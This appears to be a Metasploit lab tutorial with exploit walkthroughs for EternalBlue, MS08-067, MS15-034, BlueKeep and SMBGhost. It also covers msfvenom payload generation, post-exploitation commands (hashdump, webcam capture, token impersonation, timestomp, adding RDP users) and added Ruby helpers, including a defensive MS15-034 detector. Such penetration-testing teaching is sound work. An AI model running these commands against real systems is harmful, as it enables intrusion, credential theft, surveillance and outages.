MSF terminology explained
Exploit
An exploit is the attack an attacker or penetration tester carries out by taking advantage of a security flaw in a system, application, or service.
Common techniques include buffer overflows, web application vulnerabilities, and abuse of misconfigurations.
Payload
The payload is the code we want the target system to run once the exploit has succeeded. In the MSF framework it is chosen, delivered and implanted independently of the exploit. For example, a reverse shell is a payload that opens a network connection from the target host back to the attacker's host and provides a command shell over it. A bind shell payload instead binds a command shell to a listening port on the target host; the attacker connects to that port to interact with the shell. Which one fits depends on the network: a reverse shell gets out through NAT and egress filtering, while a bind shell needs the target's port to be reachable from the attacker.
Shellcode
Shellcode is the set of machine instructions that runs as the payload during an exploit. It is usually written in assembly. In most cases the target only hands over a command shell or a Meterpreter session after executing these instructions, which is where the name comes from.
Module
In MSF a module is a piece of software code used by the framework. Sometimes you use an exploit module, the component that actually launches the attack; at other times you use an auxiliary module, which performs actions such as scanning or enumeration rather than exploitation.
Listener
A listener is the MSF component that waits for incoming network connections. For example, after a target host has been exploited it may connect back to the attacking host over the Internet; the listener on the attacking host waits for the exploited system to connect and handles those connections.
msfconsole commands
msf6 > ?

Core Commands
=============
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands
===============
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index

Job Commands
============
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands
========================
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands
=========================
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands
============================
    creds         List all credentials in the database

Developer Commands
==================
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths

msfconsole
==========
`msfconsole` is the primary interface to Metasploit Framework.

Building ranges and lists
-------------------------
Many commands and options that take a list of things can use ranges to avoid having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs
Commands that take a list of IDs can use ranges to help. Individual IDs must be separated by a `,` (no space allowed) and ranges can be expressed with either `-` or `..`.

### Ranges of IPs
There are several ways to specify ranges of IP addresses that can be mixed together. The first way is a list of IPs separated by just a ` ` (ASCII space), with an optional `,`. The next way is two complete IP addresses in the form of `BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR specifications may also be used, however the whole address must be given to Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC. Additionally, a netmask can be used in conjunction with a domain name to dynamically resolve which block to target. All these methods work for both IPv4 and IPv6 addresses. IPv4 addresses can also be specified with special octet ranges from the [NMAP target specification](https://nmap.org/book/man-target-specification.html)

### Examples
Terminate the first session:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24

The commands used most often, in short:
    search        search modules by name or description
    use           select a module to work with
    back          leave the current module context
    connect       connect to a host (a netcat-like client)
    exit          exit the console
    info          show a module's full description and options
    irb           enter the interactive Ruby shell
    jobs          display and manage background jobs
    kill          kill a background job (not an OS process)
    loadpath      load modules from an extra directory
    quit          exit MSF
    load          load a plugin
    resource      run the commands stored in a file
    route         route traffic through a session (view or add pivot routes)
    save          save the active datastores
    set           assign a value to a variable of the current module
    show options  display the current module's options and their values
    setg          set a global variable; an RHOSTS set this way is picked up by every module used afterwards
    sleep         do nothing for the given number of seconds
    unload        unload a plugin
    unset         unset one or more variables
    unsetg        unset one or more global variables
    version       show the framework and console library versions
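As an added example (my code, not Metasploit's own Rex::Socket::RangeWalker and not code from the original page), the parser below implements the ID-range and IPv4 target syntaxes described above: comma-separated IDs with `-` or `..` ranges, CIDR (full address required, so `127/8` is rejected), `BEGIN-END` pairs, and Nmap-style per-octet ranges such as `127.0.0-2.1-4,15`. IPv6 and the domain-name/netmask form are left out.

```ruby
require 'ipaddr'

# Expand an ID list such as "2-6,7,8,11..15" into a sorted Array of Integers.
# Items are separated by "," with no spaces; a range is "a-b" or "a..b", inclusive.
def expand_id_list(spec)
  ids = spec.split(',').flat_map do |item|
    if (m = item.match(/\A(\d+)(?:-|\.\.)(\d+)\z/))
      lo, hi = m[1].to_i, m[2].to_i
      raise ArgumentError, "reversed range: #{item}" if lo > hi
      (lo..hi).to_a
    elsif item.match?(/\A\d+\z/)
      [item.to_i]
    else
      raise ArgumentError, "bad id: #{item}"
    end
  end
  ids.uniq.sort
end

# Expand one IPv4 target token into an Array of dotted-quad Strings.
# Accepts a single address, CIDR (the full address must be given, as MSF
# requires), "BEGIN-END", and Nmap octet ranges.
def expand_ipv4_token(tok)
  if tok.include?('/')
    base = tok.split('/', 2).first
    raise ArgumentError, "CIDR needs a full address: #{tok}" unless base.count('.') == 3
    return IPAddr.new(tok).to_range.map(&:to_s)
  end
  if (m = tok.match(/\A(\d+\.\d+\.\d+\.\d+)-(\d+\.\d+\.\d+\.\d+)\z/))
    lo, hi = IPAddr.new(m[1]), IPAddr.new(m[2])
    raise ArgumentError, "reversed range: #{tok}" if lo > hi
    return (lo..hi).map(&:to_s)
  end
  octets = tok.split('.')
  raise ArgumentError, "not an IPv4 spec: #{tok}" unless octets.size == 4
  # Each octet is a comma list of values or a-b ranges, e.g. "0-2" or "1-4,15".
  per_octet = octets.map do |octet|
    vals = octet.split(',').flat_map do |part|
      if (m = part.match(/\A(\d+)-(\d+)\z/))
        (m[1].to_i..m[2].to_i).to_a
      elsif part.match?(/\A\d+\z/)
        [part.to_i]
      else
        raise ArgumentError, "bad octet #{part.inspect} in #{tok}"
      end
    end
    raise ArgumentError, "octet out of range in #{tok}" if vals.any? { |v| v > 255 }
    vals.uniq.sort
  end
  a, b, c, d = per_octet
  a.product(b, c, d).map { |quad| quad.join('.') }
end

# Expand a whole RHOSTS value: tokens separated by whitespace, each with an
# optional trailing ",". Duplicates across tokens are removed.
def expand_rhosts(spec)
  spec.split(/\s+/).reject(&:empty?)
      .flat_map { |tok| expand_ipv4_token(tok.sub(/,\z/, '')) }
      .uniq
end
```

Expanding before a scan is a useful sanity check: a typo such as `10.4.7.0/8` quietly turns a subnet into sixteen million hosts, and a `-` range whose ends are reversed is rejected instead of producing an empty list.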
Exploit modules
Naming convention: os/service/name, for example windows/smb/ms08_067_netapi. The common options:
    RHOSTS   target host IP address or range (older modules call it RHOST)
    RPORT    port on the target host to connect to
    PAYLOAD  the payload to deliver; on success it hands back a shell
    LHOST    the attacker's IP address, which a reverse payload connects back to
    LPORT    the attacker's listening port for a reverse payload, or the port a bind payload opens on the target
Run `show options` after `use` to see which of these the module actually takes, and `check` (where the module supports it) before `exploit`.
Payload modules
A payload is chosen after an exploit module has been selected. Naming convention: os/type/name, for example windows/dllinject/reverse_tcp (paths are lowercase). The type segment:
    shell          a command shell
    dllinject      inject a DLL into a process
    patchup***     legacy "patchup" variants of the dllinject/meterpreter stages (they do not patch the vulnerability)
    upexec         upload and execute a file
    meterpreter    the advanced in-memory payload
    vncinject      advanced payload that injects a VNC server
    passivex       advanced payload that tunnels over HTTP through an ActiveX control
The name segment describes the connection:
    shell_find_tag     create a shell on an already established connection by looking for a tag
    shell_reverse_tcp  connect back to the attacker's host and create a shell in a single stage
    bind_tcp           listen on a TCP port on the target
    reverse_tcp        connect back to the attacker over TCP
    reverse_http       connect back through an HTTP tunnel (reverse_https does the same over TLS)
    add_user           create a new user and add it to the local Administrators group
    xxx_ipv6_tcp       the same transport over IPv6
    xxx_nonx_tcp       variant for targets with NX/DEP enabled (NX is a CPU feature that marks data pages non-executable so classic buffer-overflow shellcode cannot run from them)
    xxx_ord_tcp        ordinal-based variant: resolves ws2_32 functions by ordinal to keep the stager small
    xxx_tcp_allports   connects back trying every port in turn, for egress-filtered targets
MSF vulnerability test cases
Network service exploitation (MS08-067)
    search ms08_067
    use exploit/windows/smb/ms08_067_netapi
    set rhosts 10.4.7.50
    set payload generic/shell_bind_tcp
    exploit
The run produced a warning and most likely failed on a version mismatch: the target here was Windows Server 2003, while the online walkthroughs reproduce it against Windows XP. The module's target profiles are OS, service-pack and language specific, so run `show targets`, pick the matching one with `set target <id>`, and use `check` before `exploit` to confirm the host actually looks vulnerable.
Browser exploitation (MS10-018)
    search ms10-018
    use exploit/windows/browser/ms10_018_ie_behaviors
    set srvhost 10.4.7.20
    set payload windows/meterpreter/bind_tcp
    exploit
This is a client-side module: `exploit` starts a web server on SRVHOST and prints a URL, and a session only arrives once a vulnerable Internet Explorer on the target opens that URL.
File-format exploitation through Word (MS10-087)
Opening the document should pop a calculator.
    search MS10-087
    use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    show options
    set filename ceshi.rtf
    set payload windows/exec
    set cmd calc.exe
    exploit
`exploit` writes ceshi.rtf under ~/.msf4/local/; the file then has to be delivered to the target and opened there by other means.
CVE-2015-1635: HTTP.sys remote code execution (MS15-034)
Reading memory
    search ms15-034
    use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
    set rhosts 10.4.7.50
    run
Scanner modules take RHOSTS rather than RHOST. The check sends a request whose Range header carries an upper bound that overflows 64-bit arithmetic in HTTP.sys: an unpatched server answers 416, a patched one rejects the header with 400. Point TARGETURI at a static file such as an image if the default `/` is not served as a static resource, otherwise the range is never processed.
Blue-screen (DoS) attack
    use auxiliary/dos/http/ms15_034_ulonglongadd
    set rhosts 10.4.7.22
    set threads 10
    run
This Win7 box just wouldn't cooperate with me...
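For the defensive side of MS15-034, here is an added example (my code, not from the page or from Metasploit) that classifies raw HTTP requests by whether their Range header carries a byte-range end that no longer fits unsigned 64-bit arithmetic once one is added to it, which is the integer overflow in HTTP.sys range handling that the scanner and DoS modules above trigger. The sample requests are constructed, not captured.

```ruby
U64_MAX = 2**64 - 1

# One range bound: nil when absent, Integer otherwise. Ruby Integers are
# arbitrary precision, so 18446744073709551615 is represented exactly.
def bound(str)
  return nil if str.nil? || str.empty?
  raise ArgumentError, "non-numeric range bound: #{str.inspect}" unless str.match?(/\A\d+\z/)
  str.to_i
end

# Parse a Range header value such as "bytes=0-18446744073709551615,18-" into
# [[first, last], ...]. Returns nil when the unit is not "bytes".
def parse_byte_ranges(value)
  m = value.strip.match(/\Abytes=(.+)\z/i)
  return nil unless m
  m[1].split(',').map do |spec|
    first, last = spec.strip.split('-', 2)
    [bound(first), bound(last)]
  end
end

# The MS15-034 trigger: an end bound of 2**64-1 or larger, so that the
# end + 1 HTTP.sys computes wraps around instead of giving a length.
def overflowing_range?(_first, last)
  !last.nil? && last >= U64_MAX
end

def ms15_034_probe?(ranges)
  return false if ranges.nil?
  ranges.any? { |first, last| overflowing_range?(first, last) }
end

# Minimal request parser: request line, then "Name: value" header lines,
# CRLF separated, up to the blank line. Header names are lower-cased.
def parse_request(raw)
  head = raw.split("\r\n\r\n", 2).first
  request_line, *header_lines = head.split("\r\n")
  headers = header_lines.each_with_object({}) do |line, h|
    name, value = line.split(':', 2)
    next unless name && value
    h[name.strip.downcase] = value.strip
  end
  { request_line: request_line, headers: headers }
end

# Returns :ms15_034_probe, :malformed_range, or :ok.
def classify_request(raw)
  range = parse_request(raw)[:headers]['range']
  return :ok unless range
  ms15_034_probe?(parse_byte_ranges(range)) ? :ms15_034_probe : :ok
rescue ArgumentError
  :malformed_range
end

# Constructed sample traffic (not a real capture); the first two mirror the
# Range values used by the public MS15-034 check and DoS probes.
SAMPLE_REQUESTS = [
  "GET /welcome.png HTTP/1.1\r\nHost: 10.4.7.50\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
  "GET /welcome.png HTTP/1.1\r\nHost: 10.4.7.50\r\nRange: bytes=18-18446744073709551615\r\n\r\n",
  "GET /welcome.png HTTP/1.1\r\nHost: 10.4.7.50\r\nRange: bytes=0-1023\r\n\r\n",
  "GET /index.html HTTP/1.1\r\nHost: 10.4.7.50\r\n\r\n",
  "GET /welcome.png HTTP/1.1\r\nHost: 10.4.7.50\r\nRange: bytes=0-abc\r\n\r\n"
].freeze

def scan_samples
  SAMPLE_REQUESTS.map { |raw| classify_request(raw) }
end

puts scan_samples.inspect if $PROGRAM_NAME == __FILE__
```

The same predicate can sit in a reverse proxy or WAF rule in front of IIS: no legitimate client asks for a byte range ending at 2^64-1, so dropping those requests costs nothing and blocks both the memory-disclosure check and the blue-screen variant.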
EternalBlue (MS17-010)
    search ms17-010
    use exploit/windows/smb/ms17_010_eternalblue
    set rhosts 10.4.7.22
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 10.4.7.20
    set lport 4444
    exploit
The original listing had `set lost 10.4.7.20`, which only creates an unused variable named LOST; the option is LHOST. With a reverse payload LHOST must be an address the target can route back to, and `check` is worth running first since this module can crash an unpatched host that it fails to exploit cleanly.
Remote desktop on 3389 (CVE-2019-0708, "BlueKeep") and MS12-020
    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    set rhosts 10.4.7.22
    set rport 3389
    run
The scanner only reports whether the host looks vulnerable. For MS12-020 the equivalent modules are auxiliary/scanner/rdp/ms12_020_check and the crash module auxiliary/dos/windows/rdp/ms12_020_maxchannelids.
A Python crash PoC for CVE-2019-0708 (it blue-screens the target rather than giving a shell):
    apt-get install python3-pip
    pip3 install impacket
    git clone https://github.com/n1xbyte/CVE-2019-0708.git
    cd CVE-2019-0708
    python3 crashpoc.py 10.4.7.22 64
The trailing argument is the target's bitness as the PoC expects it.
SMBGhost, "EternalDarkness" (CVE-2020-0796)
Blue-screen (DoS) attack
    git clone https://github.com/ollypwn/SMBGhost.git
    cd SMBGhost/
    python3 scanner.py 10.4.7.30
    Traceback (most recent call last):
      File "scanner.py", line 4, in <module>
        from netaddr import IPNetwork
    ModuleNotFoundError: No module named 'netaddr'
The scanner needs the netaddr package:
    pip3 install netaddr
Then the crash PoC:
    git clone https://github.com/eerykitty/CVE-2020-0796-PoC
    cd CVE-2020-0796-PoC/
    python3 CVE-2020-0796.py 10.4.7.30
getshell
Generate a bind_tcp Meterpreter stager as Python shellcode:
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
Replace the shellcode in exploit.py with the generated output (the string assigned after `buf`; keep the USER_PAYLOAD name unchanged).
Then start a handler that connects to the port the bind payload opens on the target:
    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    set lport 4444
    set rhost 10.4.7.30
    run
LPORT here must equal the LPORT baked into the shellcode by msfvenom (the original listing used 8888 on the handler and 4444 in msfvenom, a pair that can never connect). RHOST is the target host, because with a bind payload it is the handler that dials out.
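Added example (my code, not Metasploit's): it applies the payload naming convention from the Payload modules section to decide whether a payload is bind or reverse, and from that emits both the msfvenom command and a matching multi/handler resource script from one set of inputs, so LPORT cannot drift apart as it did in the getshell listing above. The architecture list and the two-to-four-segment path layout are my assumptions about the naming scheme; hosts and ports are the page's lab addresses.

```ruby
PayloadInfo = Struct.new(:platform, :arch, :stage, :stager, :direction, keyword_init: true)

# Architectures that may appear as the second path segment (assumption: this
# covers the common ones; extend it if a payload tree uses others).
ARCH_SEGMENTS = %w[x64 x86 aarch64 armle armbe mipsle mipsbe mips64 ppc].freeze

# Parse a payload path such as "windows/x64/meterpreter/reverse_tcp" or
# "generic/shell_bind_tcp". The last segment names the transport, and whether
# it contains "bind_" or "reverse_" decides who connects to whom.
def parse_payload(name)
  parts = name.split('/')
  raise ArgumentError, "unexpected payload path: #{name}" unless (2..4).cover?(parts.size)
  platform = parts.shift
  arch = ARCH_SEGMENTS.include?(parts.first) ? parts.shift : nil
  stager = parts.pop
  stage = parts.first # nil for single-stage (inline) payloads
  direction = if stager.include?('bind_') then :bind
              elsif stager.include?('reverse_') then :reverse
              else raise ArgumentError, "cannot tell bind from reverse: #{name}"
              end
  PayloadInfo.new(platform: platform, arch: arch, stage: stage, stager: stager, direction: direction)
end

# Options the handler side needs. A reverse payload calls back to
# LHOST:LPORT on the attacker; a bind payload listens on the target, so the
# handler must dial RHOST:LPORT instead and LHOST is irrelevant.
def handler_options(info, attacker:, target:, port:)
  case info.direction
  when :reverse then { 'LHOST' => attacker, 'LPORT' => port }
  when :bind    then { 'RHOST' => target, 'LPORT' => port }
  end
end

# Options msfvenom must bake into the shellcode for the same payload.
def msfvenom_options(info, attacker:, port:)
  info.direction == :reverse ? { 'LHOST' => attacker, 'LPORT' => port } : { 'LPORT' => port }
end

def msfvenom_command(name, attacker:, port:, format: 'python', badchars: '\x00')
  info = parse_payload(name)
  opts = msfvenom_options(info, attacker: attacker, port: port).map { |k, v| "#{k}=#{v}" }
  "msfvenom -p #{name} #{opts.join(' ')} -b '#{badchars}' -f #{format}"
end

# A resource script for `msfconsole -r`: starts the handler as a background job.
def handler_rc(name, attacker:, target:, port:)
  info = parse_payload(name)
  lines = ['use exploit/multi/handler', "set PAYLOAD #{name}"]
  handler_options(info, attacker: attacker, target: target, port: port).each { |k, v| lines << "set #{k} #{v}" }
  (lines << 'run -j').join("\n")
end

# Both artefacts from one specification, so the port is typed exactly once.
def build_pair(name, attacker:, target:, port:)
  { venom: msfvenom_command(name, attacker: attacker, port: port),
    rc: handler_rc(name, attacker: attacker, target: target, port: port) }
end

if $PROGRAM_NAME == __FILE__
  pair = build_pair('windows/x64/meterpreter/bind_tcp', attacker: '10.4.7.20', target: '10.4.7.30', port: 4444)
  puts pair[:venom], pair[:rc]
end
```

Save the `rc` text to a file and start it with `msfconsole -r handler.rc`; because the script and the msfvenom line come from the same call, a port change in one place changes both.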
SMB version scan
    use auxiliary/scanner/smb/smb_version
SSH version scan
    use auxiliary/scanner/ssh/ssh_version
FTP version scan
    use auxiliary/scanner/ftp/ftp_version
Each of these is a scanner module: set RHOSTS to the host or range (and THREADS for larger ranges), then `run`. With a database connected the results are stored and can be listed afterwards with `services`.
Post-exploitation
Meterpreter commands used in the session:
    upload <file> <destination>                 upload a file to the Windows host
    upload //root//123.exe c:\\123.exe
    download <remote file> <local path>         download a file
    execute -f 123.exe                          run an executable
    execute -f cmd -c                           create a channelized cmd process
    ps                                          list processes
    shell                                       drop into an interactive command prompt
    getsystem                                   attempt privilege escalation to SYSTEM
    hashdump                                    dump password hashes
    run credcollect                             dump hashes and tokens with the credcollect script
    portfwd add -l 6666 -p 3389 -r 127.0.0.1    forward the target's port 3389 to local port 6666
    portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>    remove a port forward
    search -f *.txt                             search the target for files
    getuid                                      show the current user
    sysinfo                                     show host information
    use incognito                               load token manipulation (impersonate any user)
    list_tokens -u
    impersonate_token "Machine\\user"
    webcam_list                                 list webcams
    webcam_snap                                 take a picture with the webcam
    webcam_stream                               start a video stream from the webcam
timestomp (forge timestamps):
    timestomp -h                                show help
    timestomp C://2.txt -v                      show the file's MACE timestamps
    timestomp C://2.txt -f C://1.txt            copy 1.txt's timestamps onto 2.txt
timestomp only rewrites the $STANDARD_INFORMATION times; the $FILE_NAME attribute keeps the original values, which is exactly what forensic tooling compares against.
enable_rdp script to open 3389:
    run post/windows/manage/enable_rdp                                   enable remote desktop
    run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456     also add a user
    run post/windows/manage/enable_rdp FORWARD=true LPORT=6662           forward port 3389 to 6662
Detailed explanation: https://xz.aliyun.com/t/2536